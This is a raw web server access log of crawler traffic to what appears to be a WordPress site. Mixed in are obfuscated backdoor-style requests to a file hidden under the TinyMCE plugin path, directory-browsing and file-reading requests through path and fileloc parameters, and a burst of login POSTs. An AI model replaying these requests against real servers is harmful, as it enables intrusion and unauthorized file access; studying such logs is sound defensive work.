104.22.1.33 - - [06/Dec/2025:04:05:31 +0100] "GET /?f=2933109549 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.245.113 - - [06/Dec/2025:04:05:33 +0100] "GET /?f=329506078 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.30.99 - - [06/Dec/2025:04:05:37 +0100] "GET /?f=1859151231 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.251.209 - - [06/Dec/2025:04:03:39 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939333831392p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939303231392q3662633130663736623131333965363562376130316166323765363730383630222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.166.41 - - [06/Dec/2025:04:05:38 +0100] "GET /?f=1398987150 HTTP/1.0" 200 228557 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.30.99 - - [06/Dec/2025:04:05:48 +0100] "GET /?f=2638938506 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.80.30 - - [06/Dec/2025:04:05:52 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Freadme.html&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 25451 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.30 - - [06/Dec/2025:04:05:55 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2F5ed1a6 HTTP/1.0" 200 19521 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.30 - - [06/Dec/2025:04:05:58 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Findex.php0&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 39906 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.69.71.183 - - [06/Dec/2025:04:05:58 +0100] "GET /?f=2879926932 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
162.158.95.142 - - [06/Dec/2025:04:04:00 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939333834302p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939303234302q6265643635316534623561306566303734636662623737333063336339643263222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
104.23.245.113 - - [06/Dec/2025:04:06:00 +0100] "GET /?f=4146170345 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.166.41 - - [06/Dec/2025:04:06:00 +0100] "GET /?f=845520802 HTTP/1.0" 200 217850 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.23.245.113 - - [06/Dec/2025:04:06:02 +0100] "GET /?f=2346536504 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.30.99 - - [06/Dec/2025:04:06:04 +0100] "GET / HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.80.30 - - [06/Dec/2025:04:06:06 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com HTTP/1.0" 200 36411 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.30 - - [06/Dec/2025:04:06:07 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts HTTP/1.0" 200 16326 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.30 - - [06/Dec/2025:04:06:10 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Flicense.txt&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 36285 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.94.117 - - [06/Dec/2025:04:06:19 +0100] "GET /?f=3676494787 HTTP/1.0" 200 217786 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.130.229 - - [06/Dec/2025:04:04:21 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939333836312p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939303236312q3365623537623439633164626231633838383232333665363235356164666235222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.70.94.117 - - [06/Dec/2025:04:06:20 +0100] "GET /?f=1410246650 HTTP/1.0" 200 218822 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.30.99 - - [06/Dec/2025:04:06:20 +0100] "GET /?f=156242195 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
108.162.238.44 - - [06/Dec/2025:04:06:25 +0100] "GET /?f=3673496522 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.214.154 - - [06/Dec/2025:04:06:32 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Frobots.txt&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 16181 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.69.214.154 - - [06/Dec/2025:04:06:34 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2F6016d HTTP/1.0" 200 18087 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.69.214.154 - - [06/Dec/2025:04:06:37 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fitem.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 18479 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.122.233 - - [06/Dec/2025:04:04:42 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939333838322p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939303238322q6237346365373336306332643438616664643535323932313338373262346439222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.68.70.197 - - [06/Dec/2025:04:06:43 +0100] "GET /?f=1160094464 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.80.30 - - [06/Dec/2025:04:06:44 +0100] "GET /?path=%2F HTTP/1.0" 200 16221 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.69.71.183 - - [06/Dec/2025:04:06:46 +0100] "GET /?f=1684177121 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.22.117 - - [06/Dec/2025:04:06:46 +0100] "GET /?f=1986128237 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.80.30 - - [06/Dec/2025:04:06:47 +0100] "GET /?path=%2Fvar HTTP/1.0" 200 16250 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.30 - - [06/Dec/2025:04:06:50 +0100] "GET /?path=%2Fvar%2Fwww HTTP/1.0" 200 16283 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.166.41 - - [06/Dec/2025:04:06:57 +0100] "GET /?f=3714161042 HTTP/1.0" 200 200758 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.23.239.81 - - [06/Dec/2025:04:05:03 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939333930332p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939303330332q6162646165663462363334663136633663313438306234316139306261646334222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
104.22.1.33 - - [06/Dec/2025:04:07:03 +0100] "GET /?f=4007849501 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.80.30 - - [06/Dec/2025:04:07:05 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 465892 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.30 - - [06/Dec/2025:04:07:06 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-blog-header.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 16468 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
198.41.227.173 - - [06/Dec/2025:04:07:06 +0100] "GET /sitemap-subkey-2212.xml HTTP/1.0" 200 160085 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.80.30 - - [06/Dec/2025:04:07:09 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-content HTTP/1.0" 200 41791 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.22.117 - - [06/Dec/2025:04:07:14 +0100] "GET /?f=3837910567 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.30.99 - - [06/Dec/2025:04:07:15 +0100] "GET /?f=1915097535 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.166.41 - - [06/Dec/2025:04:07:16 +0100] "GET /?f=2183469794 HTTP/1.0" 200 236024 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
108.162.238.44 - - [06/Dec/2025:04:07:17 +0100] "GET /?f=2846846514 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.22.20.24 - - [06/Dec/2025:04:07:20 +0100] "POST /wp-login.php HTTP/1.0" 200 63847 "-" "Mozilla/5.0"
162.158.167.57 - - [06/Dec/2025:04:07:20 +0100] "POST /wp-login.php HTTP/1.0" 200 63847 "-" "Mozilla/5.0"
104.22.20.24 - - [06/Dec/2025:04:07:20 +0100] "POST /wp-login.php HTTP/1.0" 200 63847 "-" "Mozilla/5.0"
172.69.22.244 - - [06/Dec/2025:04:07:21 +0100] "POST /wp-login.php HTTP/1.0" 200 63847 "-" "Mozilla/5.0"
172.69.134.17 - - [06/Dec/2025:04:07:21 +0100] "POST /wp-login.php HTTP/1.0" 200 63847 "-" "Mozilla/5.0"
172.71.158.71 - - [06/Dec/2025:04:07:21 +0100] "POST /wp-login.php HTTP/1.0" 200 63847 "-" "Mozilla/5.0"
104.22.20.24 - - [06/Dec/2025:04:07:22 +0100] "POST /wp-login.php HTTP/1.0" 200 63847 "-" "Mozilla/5.0"
104.22.17.8 - - [06/Dec/2025:04:07:22 +0100] "POST /wp-login.php HTTP/1.0" 200 63847 "-" "Mozilla/5.0"
172.71.30.99 - - [06/Dec/2025:04:07:23 +0100] "GET /?f=4055953656 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.164.92 - - [06/Dec/2025:04:05:24 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939333932342p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939303332342q3835643235613539313462396337306438646632343330663939346135373762222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
104.22.1.33 - - [06/Dec/2025:04:07:29 +0100] "GET /?f=2907383819 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.166.41 - - [06/Dec/2025:04:07:35 +0100] "GET /?f=1900851021 HTTP/1.0" 200 224852 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
108.162.238.44 - - [06/Dec/2025:04:07:37 +0100] "GET /?f=1787638729 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
108.162.238.44 - - [06/Dec/2025:04:07:40 +0100] "GET /?f=2146385050 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.30.99 - - [06/Dec/2025:04:07:41 +0100] "GET /?f=2651351555 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.80.30 - - [06/Dec/2025:04:07:41 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-cron.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 22078 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.30 - - [06/Dec/2025:04:07:44 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-links-opml.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 19142 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.232.100 - - [06/Dec/2025:04:05:45 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939333934352p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939303334352q3435633831353431636261346665623336643838336634303366353664373065222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.22.117 - - [06/Dec/2025:04:07:46 +0100] "GET /?f=779753245 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.166.41 - - [06/Dec/2025:04:07:54 +0100] "GET /?f=168620228 HTTP/1.0" 200 230625 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.166.41 - - [06/Dec/2025:04:07:55 +0100] "GET /?f=424389373 HTTP/1.0" 200 209551 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
108.162.238.44 - - [06/Dec/2025:04:07:56 +0100] "GET /?f=1717823909 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.71.183 - - [06/Dec/2025:04:07:57 +0100] "GET /?f=4141968540 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.214.154 - - [06/Dec/2025:04:07:57 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-signup.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 57820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.69.214.154 - - [06/Dec/2025:04:07:59 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-load.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 20631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.30.99 - - [06/Dec/2025:04:08:00 +0100] "GET /?f=2704108 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.22.1.33 - - [06/Dec/2025:04:08:02 +0100] "GET /?f=3661388257 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.214.154 - - [06/Dec/2025:04:08:02 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Findex.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 39905 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
108.162.238.44 - - [06/Dec/2025:04:08:05 +0100] "GET /?f=1800037894 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.22.1.33 - - [06/Dec/2025:04:08:05 +0100] "GET /?f=564158978 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.166.41 - - [06/Dec/2025:04:08:05 +0100] "GET /?f=2292086909 HTTP/1.0" 200 222797 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.158.95.142 - - [06/Dec/2025:04:06:06 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939333936362p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939303336362q3431396162303139376136616464396133346265326662383034646635303035222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
104.23.245.112 - - [06/Dec/2025:04:08:16 +0100] "GET /?o=64451793011730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.120.52 - - [06/Dec/2025:04:08:17 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 63847 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.120.52 - - [06/Dec/2025:04:08:19 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-admin HTTP/1.0" 200 176880 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
104.23.245.112 - - [06/Dec/2025:04:08:21 +0100] "GET /?f=3506830527 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
108.162.238.44 - - [06/Dec/2025:04:08:22 +0100] "GET /?f=872788867 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.120.52 - - [06/Dec/2025:04:08:22 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-comments-post.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 18765 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.166.41 - - [06/Dec/2025:04:08:22 +0100] "GET /?f=1532193079 HTTP/1.0" 200 219514 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.30.99 - - [06/Dec/2025:04:08:23 +0100] "GET /?f=3181927183 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.239.81 - - [06/Dec/2025:04:06:27 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939333938372p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939303338372q3262633432336464326531616536306531373136336666363234613265666334222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.166.41 - - [06/Dec/2025:04:08:29 +0100] "GET /sitemap-subkey-303.xml HTTP/1.0" 200 160083 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.22.1.33 - - [06/Dec/2025:04:08:33 +0100] "GET /?f=1346770895 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.80.30 - - [06/Dec/2025:04:08:38 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fimages HTTP/1.0" 200 19552 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.30 - - [06/Dec/2025:04:08:40 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs HTTP/1.0" 200 18183 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
